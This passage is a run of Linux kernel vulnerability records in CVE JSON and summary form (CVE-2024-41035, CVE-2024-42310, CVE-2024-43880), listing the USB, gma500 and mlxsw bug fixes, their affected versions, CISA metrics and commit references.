"url": "https://git.kernel.org/stable/c/d09dd21bb5215d583ca9a1cb1464dbc77a7e88cf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2bd8534a1b83c65702aec3cab164170f8e584188"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9edcf317620d7c6a8354911b69b874cf89716646"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/647d61aef106dbed9c70447bcddbd4968e67ca64"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/37514a5c1251a8c5c95c323f55050736e7069ac7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a368ecde8a5055b627749b09c6218ef793043e47"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-41035",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:23:33.705561Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:34:03.568Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/usb/core/config.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d8418fd083d1b90a6c007cf8dcf81aeae274727b",
"status": "affected",
"version": "0a8fd1346254974c3a852338508e4a4cddbb35f1",
"versionType": "git"
},
{
"lessThan": "60abea505b726b38232a0ef410d2bd1994a77f78",
"status": "affected",
"version": "0a8fd1346254974c3a852338508e4a4cddbb35f1",
"versionType": "git"
},
{
"lessThan": "d09dd21bb5215d583ca9a1cb1464dbc77a7e88cf",
"status": "affected",
"version": "0a8fd1346254974c3a852338508e4a4cddbb35f1",
"versionType": "git"
},
{
"lessThan": "2bd8534a1b83c65702aec3cab164170f8e584188",
"status": "affected",
"version": "0a8fd1346254974c3a852338508e4a4cddbb35f1",
"versionType": "git"
},
{
"lessThan": "9edcf317620d7c6a8354911b69b874cf89716646",
"status": "affected",
"version": "0a8fd1346254974c3a852338508e4a4cddbb35f1",
"versionType": "git"
},
{
"lessThan": "647d61aef106dbed9c70447bcddbd4968e67ca64",
"status": "affected",
"version": "0a8fd1346254974c3a852338508e4a4cddbb35f1",
"versionType": "git"
},
{
"lessThan": "37514a5c1251a8c5c95c323f55050736e7069ac7",
"status": "affected",
"version": "0a8fd1346254974c3a852338508e4a4cddbb35f1",
"versionType": "git"
},
{
"lessThan": "a368ecde8a5055b627749b09c6218ef793043e47",
"status": "affected",
"version": "0a8fd1346254974c3a852338508e4a4cddbb35f1",
"versionType": "git"
},
{
"status": "affected",
"version": "c3726b442527ab31c7110d0445411f5b5343db01",
"versionType": "git"
},
{
"status": "affected",
"version": "15668b4354b38b41b316571deed2763d631b2977",
"versionType": "git"
},
{
"status": "affected",
"version": "8597a9245181656ae2ef341906e5f40af323fbca",
"versionType": "git"
},
{
"status": "affected",
"version": "264024a2676ba7d91fe7b1713b2c32d1b0b508cb",
"versionType": "git"
},
{
"status": "affected",
"version": "b0de742a1be16b76b534d088682f18cf57f012d2",
"versionType": "git"
},
{
"status": "affected",
"version": "7cc00abef071a8a7d0f4457b7afa2f57f683d83f",
"versionType": "git"
},
{
"status": "affected",
"version": "05b0f2fc3c2f9efda47439557e0d51faca7e43ed",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/usb/core/config.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.10"
},
{
"lessThan": "4.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.318",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.280",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.222",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.163",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.100",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.41",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.318",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.280",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.222",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.163",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.100",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.41",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.10",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.2.87",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.10.106",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.12.70",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "3.16.42",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.1.39",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.4.42",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.9.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: core: Fix duplicate endpoint bug by clearing reserved bits in the descriptor\n\nSyzbot has identified a bug in usbcore (see the Closes: tag below)\ncaused by our assumption that the reserved bits in an endpoint\ndescriptor\u0027s bEndpointAddress field will always be 0. As a result of\nthe bug, the endpoint_is_duplicate() routine in config.c (and possibly\nother routines as well) may believe that two descriptors are for\ndistinct endpoints, even though they have the same direction and\nendpoint number. This can lead to confusion, including the bug\nidentified by syzbot (two descriptors with matching endpoint numbers\nand directions, where one was interrupt and the other was bulk).\n\nTo fix the bug, we will clear the reserved bits in bEndpointAddress\nwhen we parse the descriptor. (Note that both the USB-2.0 and USB-3.1\nspecs say these bits are \"Reserved, reset to zero\".) This requires us\nto make a copy of the descriptor earlier in usb_parse_endpoint() and\nuse the copy instead of the original when checking for duplicates."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:57:27.395Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d8418fd083d1b90a6c007cf8dcf81aeae274727b"
},
{
"url": "https://git.kernel.org/stable/c/60abea505b726b38232a0ef410d2bd1994a77f78"
},
{
"url": "https://git.kernel.org/stable/c/d09dd21bb5215d583ca9a1cb1464dbc77a7e88cf"
},
{
"url": "https://git.kernel.org/stable/c/2bd8534a1b83c65702aec3cab164170f8e584188"
},
{
"url": "https://git.kernel.org/stable/c/9edcf317620d7c6a8354911b69b874cf89716646"
},
{
"url": "https://git.kernel.org/stable/c/647d61aef106dbed9c70447bcddbd4968e67ca64"
},
{
"url": "https://git.kernel.org/stable/c/37514a5c1251a8c5c95c323f55050736e7069ac7"
},
{
"url": "https://git.kernel.org/stable/c/a368ecde8a5055b627749b09c6218ef793043e47"
}
],
"title": "USB: core: Fix duplicate endpoint bug by clearing reserved bits in the descriptor",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-41035",
"datePublished": "2024-07-29T14:31:49.876Z",
"dateReserved": "2024-07-12T12:17:45.619Z",
"dateUpdated": "2025-05-04T12:57:27.395Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42310 (GCVE-0-2024-42310)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/gma500: fix null pointer dereference in cdv_intel_lvds_get_modes
In cdv_intel_lvds_get_modes(), the return value of drm_mode_duplicate()
is assigned to mode, which will lead to a NULL pointer dereference on
failure of drm_mode_duplicate(). Add a check to avoid npd.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 6a227d5fd6c4abe6a9226a40f6981825e9da5fbe Version: 6a227d5fd6c4abe6a9226a40f6981825e9da5fbe Version: 6a227d5fd6c4abe6a9226a40f6981825e9da5fbe Version: 6a227d5fd6c4abe6a9226a40f6981825e9da5fbe Version: 6a227d5fd6c4abe6a9226a40f6981825e9da5fbe Version: 6a227d5fd6c4abe6a9226a40f6981825e9da5fbe Version: 6a227d5fd6c4abe6a9226a40f6981825e9da5fbe Version: 6a227d5fd6c4abe6a9226a40f6981825e9da5fbe |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42310",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:10:02.672405Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:27.324Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/gma500/cdv_intel_lvds.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "f392c36cebf4c1d6997a4cc2c0f205254acef42a",
"status": "affected",
"version": "6a227d5fd6c4abe6a9226a40f6981825e9da5fbe",
"versionType": "git"
},
{
"lessThan": "a658ae2173ab74667c009e2550455e6de5b33ddc",
"status": "affected",
"version": "6a227d5fd6c4abe6a9226a40f6981825e9da5fbe",
"versionType": "git"
},
{
"lessThan": "b6ac46a00188cde50ffba233e6efb366354a1de5",
"status": "affected",
"version": "6a227d5fd6c4abe6a9226a40f6981825e9da5fbe",
"versionType": "git"
},
{
"lessThan": "08f45102c81ad8bc9f85f7a25e9f64e128edb87d",
"status": "affected",
"version": "6a227d5fd6c4abe6a9226a40f6981825e9da5fbe",
"versionType": "git"
},
{
"lessThan": "e74eb5e8089427c8c49e0dd5067e5f39ce3a4d56",
"status": "affected",
"version": "6a227d5fd6c4abe6a9226a40f6981825e9da5fbe",
"versionType": "git"
},
{
"lessThan": "2d209b2f862f6b8bff549ede541590a8d119da23",
"status": "affected",
"version": "6a227d5fd6c4abe6a9226a40f6981825e9da5fbe",
"versionType": "git"
},
{
"lessThan": "977ee4fe895e1729cd36cc26916bbb10084713d6",
"status": "affected",
"version": "6a227d5fd6c4abe6a9226a40f6981825e9da5fbe",
"versionType": "git"
},
{
"lessThan": "cb520c3f366c77e8d69e4e2e2781a8ce48d98e79",
"status": "affected",
"version": "6a227d5fd6c4abe6a9226a40f6981825e9da5fbe",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/gma500/cdv_intel_lvds.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.3"
},
{
"lessThan": "3.3",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "3.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "3.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/gma500: fix null pointer dereference in cdv_intel_lvds_get_modes\n\nIn cdv_intel_lvds_get_modes(), the return value of drm_mode_duplicate()\nis assigned to mode, which will lead to a NULL pointer dereference on\nfailure of drm_mode_duplicate(). Add a check to avoid npd."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:29.364Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/f392c36cebf4c1d6997a4cc2c0f205254acef42a"
},
{
"url": "https://git.kernel.org/stable/c/a658ae2173ab74667c009e2550455e6de5b33ddc"
},
{
"url": "https://git.kernel.org/stable/c/b6ac46a00188cde50ffba233e6efb366354a1de5"
},
{
"url": "https://git.kernel.org/stable/c/08f45102c81ad8bc9f85f7a25e9f64e128edb87d"
},
{
"url": "https://git.kernel.org/stable/c/e74eb5e8089427c8c49e0dd5067e5f39ce3a4d56"
},
{
"url": "https://git.kernel.org/stable/c/2d209b2f862f6b8bff549ede541590a8d119da23"
},
{
"url": "https://git.kernel.org/stable/c/977ee4fe895e1729cd36cc26916bbb10084713d6"
},
{
"url": "https://git.kernel.org/stable/c/cb520c3f366c77e8d69e4e2e2781a8ce48d98e79"
}
],
"title": "drm/gma500: fix null pointer dereference in cdv_intel_lvds_get_modes",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42310",
"datePublished": "2024-08-17T09:09:14.820Z",
"dateReserved": "2024-07-30T07:40:12.276Z",
"dateUpdated": "2025-05-04T09:26:29.364Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43880 (GCVE-0-2024-43880)
Vulnerability from cvelistv5
Published
2024-08-21 00:06
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_acl_erp: Fix object nesting warning
ACLs in Spectrum-2 and newer ASICs can reside in the algorithmic TCAM
(A-TCAM) or in the ordinary circuit TCAM (C-TCAM). The former can
contain more ACLs (i.e., tc filters), but the number of masks in each
region (i.e., tc chain) is limited.
In order to mitigate the effects of the above limitation, the device
allows filters to share a single mask if their masks only differ in up
to 8 consecutive bits. For example, dst_ip/25 can be represented using
dst_ip/24 with a delta of 1 bit. The C-TCAM does not have a limit on the
number of masks being used (and therefore does not support mask
aggregation), but can contain a limited number of filters.
The driver uses the "objagg" library to perform the mask aggregation by
passing it objects that consist of the filter's mask and whether the
filter is to be inserted into the A-TCAM or the C-TCAM since filters in
different TCAMs cannot share a mask.
The set of created objects is dependent on the insertion order of the
filters and is not necessarily optimal. Therefore, the driver will
periodically ask the library to compute a more optimal set ("hints") by
looking at all the existing objects.
When the library asks the driver whether two objects can be aggregated
the driver only compares the provided masks and ignores the A-TCAM /
C-TCAM indication. This is the right thing to do since the goal is to
move as many filters as possible to the A-TCAM. The driver also forbids
two identical masks from being aggregated since this can only happen if
one was intentionally put in the C-TCAM to avoid a conflict in the
A-TCAM.
The above can result in the following set of hints:
H1: {mask X, A-TCAM} -> H2: {mask Y, A-TCAM} // X is Y + delta
H3: {mask Y, C-TCAM} -> H4: {mask Z, A-TCAM} // Y is Z + delta
After getting the hints from the library the driver will start migrating
filters from one region to another while consulting the computed hints
and instructing the device to perform a lookup in both regions during
the transition.
Assuming a filter with mask X is being migrated into the A-TCAM in the
new region, the hints lookup will return H1. Since H2 is the parent of
H1, the library will try to find the object associated with it and
create it if necessary in which case another hints lookup (recursive)
will be performed. This hints lookup for {mask Y, A-TCAM} will either
return H2 or H3 since the driver passes the library an object comparison
function that ignores the A-TCAM / C-TCAM indication.
This can eventually lead to nested objects which are not supported by
the library [1].
Fix by removing the object comparison function from both the driver and
the library as the driver was the only user. That way the lookup will
only return exact matches.
I do not have a reliable reproducer that can reproduce the issue in a
timely manner, but before the fix the issue would reproduce in several
minutes and with the fix it does not reproduce in over an hour.
Note that the current usefulness of the hints is limited because they
include the C-TCAM indication and represent aggregation that cannot
actually happen. This will be addressed in net-next.
[1]
WARNING: CPU: 0 PID: 153 at lib/objagg.c:170 objagg_obj_parent_assign+0xb5/0xd0
Modules linked in:
CPU: 0 PID: 153 Comm: kworker/0:18 Not tainted 6.9.0-rc6-custom-g70fbc2c1c38b #42
Hardware name: Mellanox Technologies Ltd. MSN3700C/VMOD0008, BIOS 5.11 10/10/2018
Workqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work
RIP: 0010:objagg_obj_parent_assign+0xb5/0xd0
[...]
Call Trace:
<TASK>
__objagg_obj_get+0x2bb/0x580
objagg_obj_get+0xe/0x80
mlxsw_sp_acl_erp_mask_get+0xb5/0xf0
mlxsw_sp_acl_atcam_entry_add+0xe8/0x3c0
mlxsw_sp_acl_tcam_entry_create+0x5e/0xa0
mlxsw_sp_acl_tcam_vchunk_migrate_one+0x16b/0x270
mlxsw_sp_acl_tcam_vregion_rehash_work+0xbe/0x510
process_one_work+0x151/0x370
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 9069a3817d82b01b3a55da382c774e3575946130 Version: 9069a3817d82b01b3a55da382c774e3575946130 Version: 9069a3817d82b01b3a55da382c774e3575946130 Version: 9069a3817d82b01b3a55da382c774e3575946130 Version: 9069a3817d82b01b3a55da382c774e3575946130 Version: 9069a3817d82b01b3a55da382c774e3575946130 Version: 9069a3817d82b01b3a55da382c774e3575946130 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43880",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:05:51.322073Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:17.371Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c",
"include/linux/objagg.h",
"lib/objagg.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "4dc09f6f260db3c4565a4ec52ba369393598f2fb",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
},
{
"lessThan": "36a9996e020dd5aa325e0ecc55eb2328288ea6bb",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
},
{
"lessThan": "9a5261a984bba4f583d966c550fa72c33ff3714e",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
},
{
"lessThan": "25c6fd9648ad05da493a5d30881896a78a08b624",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
},
{
"lessThan": "0e59c2d22853266704e127915653598f7f104037",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
},
{
"lessThan": "fb5d4fc578e655d113f09565f6f047e15f7ab578",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
},
{
"lessThan": "97d833ceb27dc19f8777d63f90be4a27b5daeedf",
"status": "affected",
"version": "9069a3817d82b01b3a55da382c774e3575946130",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_erp.c",
"include/linux/objagg.h",
"lib/objagg.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.1"
},
{
"lessThan": "5.1",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.1",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_erp: Fix object nesting warning\n\nACLs in Spectrum-2 and newer ASICs can reside in the algorithmic TCAM\n(A-TCAM) or in the ordinary circuit TCAM (C-TCAM). The former can\ncontain more ACLs (i.e., tc filters), but the number of masks in each\nregion (i.e., tc chain) is limited.\n\nIn order to mitigate the effects of the above limitation, the device\nallows filters to share a single mask if their masks only differ in up\nto 8 consecutive bits. For example, dst_ip/25 can be represented using\ndst_ip/24 with a delta of 1 bit. The C-TCAM does not have a limit on the\nnumber of masks being used (and therefore does not support mask\naggregation), but can contain a limited number of filters.\n\nThe driver uses the \"objagg\" library to perform the mask aggregation by\npassing it objects that consist of the filter\u0027s mask and whether the\nfilter is to be inserted into the A-TCAM or the C-TCAM since filters in\ndifferent TCAMs cannot share a mask.\n\nThe set of created objects is dependent on the insertion order of the\nfilters and is not necessarily optimal. Therefore, the driver will\nperiodically ask the library to compute a more optimal set (\"hints\") by\nlooking at all the existing objects.\n\nWhen the library asks the driver whether two objects can be aggregated\nthe driver only compares the provided masks and ignores the A-TCAM /\nC-TCAM indication. This is the right thing to do since the goal is to\nmove as many filters as possible to the A-TCAM. The driver also forbids\ntwo identical masks from being aggregated since this can only happen if\none was intentionally put in the C-TCAM to avoid a conflict in the\nA-TCAM.\n\nThe above can result in the following set of hints:\n\nH1: {mask X, A-TCAM} -\u003e H2: {mask Y, A-TCAM} // X is Y + delta\nH3: {mask Y, C-TCAM} -\u003e H4: {mask Z, A-TCAM} // Y is Z + delta\n\nAfter getting the hints from the library the driver will start migrating\nfilters from one region to another while consulting the computed hints\nand instructing the device to perform a lookup in both regions during\nthe transition.\n\nAssuming a filter with mask X is being migrated into the A-TCAM in the\nnew region, the hints lookup will return H1. Since H2 is the parent of\nH1, the library will try to find the object associated with it and\ncreate it if necessary in which case another hints lookup (recursive)\nwill be performed. This hints lookup for {mask Y, A-TCAM} will either\nreturn H2 or H3 since the driver passes the library an object comparison\nfunction that ignores the A-TCAM / C-TCAM indication.\n\nThis can eventually lead to nested objects which are not supported by\nthe library [1].\n\nFix by removing the object comparison function from both the driver and\nthe library as the driver was the only user. That way the lookup will\nonly return exact matches.\n\nI do not have a reliable reproducer that can reproduce the issue in a\ntimely manner, but before the fix the issue would reproduce in several\nminutes and with the fix it does not reproduce in over an hour.\n\nNote that the current usefulness of the hints is limited because they\ninclude the C-TCAM indication and represent aggregation that cannot\nactually happen. This will be addressed in net-next.\n\n[1]\nWARNING: CPU: 0 PID: 153 at lib/objagg.c:170 objagg_obj_parent_assign+0xb5/0xd0\nModules linked in:\nCPU: 0 PID: 153 Comm: kworker/0:18 Not tainted 6.9.0-rc6-custom-g70fbc2c1c38b #42\nHardware name: Mellanox Technologies Ltd. MSN3700C/VMOD0008, BIOS 5.11 10/10/2018\nWorkqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work\nRIP: 